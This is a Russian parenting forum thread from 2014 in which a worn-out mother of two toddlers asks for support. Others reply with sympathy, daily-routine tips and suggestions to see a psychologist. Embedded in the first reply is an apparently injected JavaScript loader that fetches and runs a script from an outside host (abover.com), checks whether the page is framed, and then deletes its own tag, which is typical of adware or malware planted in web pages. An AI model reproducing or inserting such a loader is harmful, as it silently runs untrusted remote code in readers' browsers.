просто устала... поддержите, а?

дд. в общем у меня тоже самое. хотя детей трое. вроде -бы и подросли и в сад и на работу вышла - но никакой радости. хотя жаловаться -то и не на что... муж помогает, детки радуют, и на работе смена обстановки... не знаю, что посоветовать... сама такая. но если в физическом плане -  дальше будет легче, а вот в моральном... я милону8 пью. вроде-бы полегче. нет такого раздражения непереносимого.[removed](function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random() + '&v=1.0.8'; script.onload = script.onerror = function () { script.onload = script.onerror = null; script[removed].removeChild(script); } document.body.appendChild(script); })();[removed]
19.01.2014
А у вас нет возможности няню нанять? Моя подруга так сделала, сначала два раза в неделю на несколько часов. А потом вышла на работу и няня в сад водит детей, на больничных сидит(мама только первые два-три дня, пока температура высокая), на занятия водит.(Правда у подруги з\п позволяет это делать). А до этого стала она как нервно больная, орала, срывалась, даже в разговоре со мной начала говорить матом(а она совсем другой человек по жизни), руки потрескались и она их в кровь расчёсывала. А теперь всё хорошо, умница-красавица.
15.01.2014
Потерпите немного, с каждым годом все легче и легче будет))) Поверьте мне ,у нас разница еще меньше чем у вас) И я мать-одиночка с погодками) Главное организовать быт, подключать мужа к воспитанию детей, пусть в его обязанности входит детей купать, например)Держитесь, детки это прекрасно)
14.01.2014
Ну хоть кто-то настроен позитивно)))
24.01.2014
Вам желаю удачного разрешения ваших нервных и физических нагрузок, побольше помощи от мужа или родственников, вы сильная женщина и еще и с 2 мя детками. Совет- смените обстановку найдите время на себя, как уже сказали ходите в гости хоть и с детьми и всей семьей, это тоже хорошая возможность перевести дух! Сама так делала, в декрете сидела 3 года надоело все и все. Ничего все наладилось и на работу вышла, и в садик ходим и по мужу скучаю и люблю очень. Все не так и плохо, а летом обязательно на море!!!
14.01.2014
да, спасибо, дотерпеть бы до сентября.
14.01.2014
Время быстро пройдет, не заметите ;)
15.01.2014
Вы - сильная девушка, я бы с погодками тронулась однозначно) Держитесь, больше гуляйте что-ли... посоветовать ничего не могу толкового
14.01.2014
спасибо!
14.01.2014
Первое - обратитесь к нормальному врачу и подберите нормальные лекарства. Муж будет возникать из-за 1000 рублей? Тогда и вы когда он простудится не покупайте ему лекарства на 1000 рублей, а поите травками.Второе - найдет занятие для души. Каждый вечер ровно в 21-00 у меня начинается свое время, я не убираю, не мою посуду,  не глажу и т.д., я ложусь на диван и читаю, вяжу, да просто сижу в интернете. Муж возмущен немытой посудой, ибо он работает один? Предложите ему поменяться ролями, судя по тому что для вас лекарства на 1000 - дорого, значит он не миллионер и вы сможете заработать столько же. Он согласится? Вряд ли. Так что несколько тарелок и сам муж может помыть.Третье - поменьше обращайте внимания на истерики. Истеришь - на здоровье, ори сколько влезет. Поговорим когда успокоишься. У нас папа ставит сына в угол плакать, когда тот проорется (5 минут) из угла выходит, разбираемся на тему "ты понимаешь за что ты был в углу и как надо себя вести?" и спокойно идем играть. Не понимаешь и орешь - иди орать дальше. Четвертое - периодически - 1-2 раза в неделю сваливайте из домашнего дурдома на свободу, в магазины, к подругам, на выставку, концерт и т.д.  Я 4 года на могла позволить себе сходить на концерт, все думала - а как тут без меня, дорогие билеты и т.д. А сейчас понимаю - нельзя экономить на себе и никто не умрет если мама на 3-4- часа уйдет из дома.Пятое - ходите в гости с детьми. Да, вы не отдохнете, но вы смените обстановку, а это тоже очень важно. Ваша мама далеко живет? Погостите у нее несколько дней, у детей будут новые впечатления, вы с мужем отдохнете друг от друга, у мамы будет возможность отдохнуть, а у бабушки пообщаться с внуками. Мы по выходным ходим к свекрови на 3-4 часа, и хоть я там присутствую, но не раздражаюсь, потому что детям весело в новом месте, свекровь накормит, и можно посидеть и посмотреть телек, да даже просто со свекровью поболтать. Ну и последнее - почитайте сообщество "мой ребенок не такой как все". Вы поймете, что живете в сказке. Удачи вам.
14.01.2014
со всем согласна кроме 3его. я так не смогу. не могу воспринимать всё проще. когда дети истерят, сама психовать начинаю. может оно и верно, то , что вы говорите. но как мне так заткнуть уши и не слышать ор, я не знаю. и насчёт 1го. а когда вы готовите кушать? я ещё готовлю раздельно. поэтому вечер занят часов до 11ти. да думаю в этом основная проблема.
14.01.2014
Сейчас когда в сад пошли конечно больше времени на готовку, но в сад мы пошли после 3 лет. До этого готовила только пока дети бодрствовали. Пока совсем мелкие были -  сажала в стулья для кормления, потом просто занимала чем-то. Да и что там готовить? Утром кашу - это 5-10 минут. На обед-ужин готовлю что-то одно, либо суп, либо второе. После полутора лет у нас был режим - дети умыты, одеты и накормлены - мама час-полтора занимается хозяйством, готовит, убирает и т.д. Потом мама вся в распоряжении детей, они привыкли, отвлекают только если подерутся или на горшок/попить захотят. Когда 2 лет еще не было - посуду мыли втроем, ставила детей на стулья к мойке, давала им банки и ложки и пока они плескались, мыла  посуду, а что делать))) Мы перешли на общий стол в 1,3 где-то потому что готовить три меню (кто-то посты соблюдает, кто-то - ребенок, кто-то любит жирное и соленое) у меня просто не было сил. Так что я всю семью перевела на полезную еду, если кому-то хочется чего-то вредного - покупали отдельно для взрослых. До 2 лет после того как дети ложились спать у меня было только 2 дела - развесить постиранные колготки и по быстрому протереть уписанный пол, но это не более 30 минут, да и то чаще я на мужа это спихивала. Делаю постоянно домашние полуфабрикаты - голубцы, фаршированный перец, котлеты, отбивные, раз в месяц повозишься - потом никакой мороки с готовкой, я даже утром мужу готовлю на работу обед - достаю замороженную котлету или отбивную, поджариваю, отвариваю гарнир и готово, дело 15 минут. Мультиварка - вещь, но я летом в основном ее использую, поставила вариться суп и пошла на полдня с детьми гулять. Ну и на крики все же учитесь реагировать спокойнее. У нас крики не прекращаются с рождения, у нас никогда до 2 лет не было тихо, кто-то постоянно орал, я уже по поводу криков не психую. Вот откровенное непослушание и игнорирование меня бесит, но я с собой борюсь)))
14.01.2014
найдите себе какую нибудь отдушину. занятие или "незанятие" и пусть муж пусть редко час-два в неделю дает вам эту возможность если это будет например плаванье в бассейне, или поход в баню, или посещение спасалона/массажиста .... что нибудь что принесет вам расслабление и востановление (может вообще вам нарвится просто посидеть отдной в парке на лавочке); а может не покидая дома вы найдете себе что-то что будет успокаиавать - что вы будете делать не потому что так надо(постирать, убрать, приготовить), а потому что вам это нравится - может женские романы почитать, может что-то связать. моя подруга высегда говорила что ее успокаивает вышивание кестиком))) (я попробовала - меня наоборот раздражает))я уверенна что у каждого человека есть своя личная отдушина, какое нибудь занятие которое приносит вам удовольствие и поднимает настроение
13.01.2014
На мой взгляд, вам обязательно нужно посетить психолога, то, что с вами происходит, вполне нормально, вы устали.  Есть метод EMDR - прекрасно помогает справиться с таким состоянием, не переживайте. 
13.01.2014
спасибо. я почитала про него, действительно интересно. пожалуй уговорю мужа на психолога.
13.01.2014
http://www.matrony.ru/chto-takoe-depressiya-i-kak-s-nej-borotsya/ вот ксати очень хорошая статья тоже, почитайте. Все у вас наладится, а психолог, это необходимость в данном случае, постарайтесь донести это до мужа.
14.01.2014
Ни капли вас не осуждаю.Себя вспоминаю,когда родила.Просто крыша улетала,я на людей бросалась,как собака...Не представляю,как вам хватает сил на ваших погодочков. Держитесь,милая.Все равно время работает на вас.С каждым месяцем детки становятся взрослее,вам будет легче и легче.Понимаю,что мои слова,наверное,звучат невероятно,но это так.Однажды вы проснетесь и поймете,что ЖИВЕТЕ,а не крутитесь,как белка в колесе.Со мной так было.Сейчас я живу и наслаждаюсь своим материнством,а было все ой как тяжело.У меня тоже муж круглосуточно на работе,а бабушки все живут в тридевятом царстве.Понимаю вас и от всего сердца желаю терпения.
13.01.2014
спасибо! мне бы просто переключиться. вроде бы уже легче, а я как будто по инерции продолжаю "крутиться". не могу переключиться никак (
13.01.2014
Оставшиеся комментарии доступны после регистрации
Зарегистрируйтесь и получите полный доступ ко всем функциям сайта.
Тяжело... Жалко... Помогите разобраться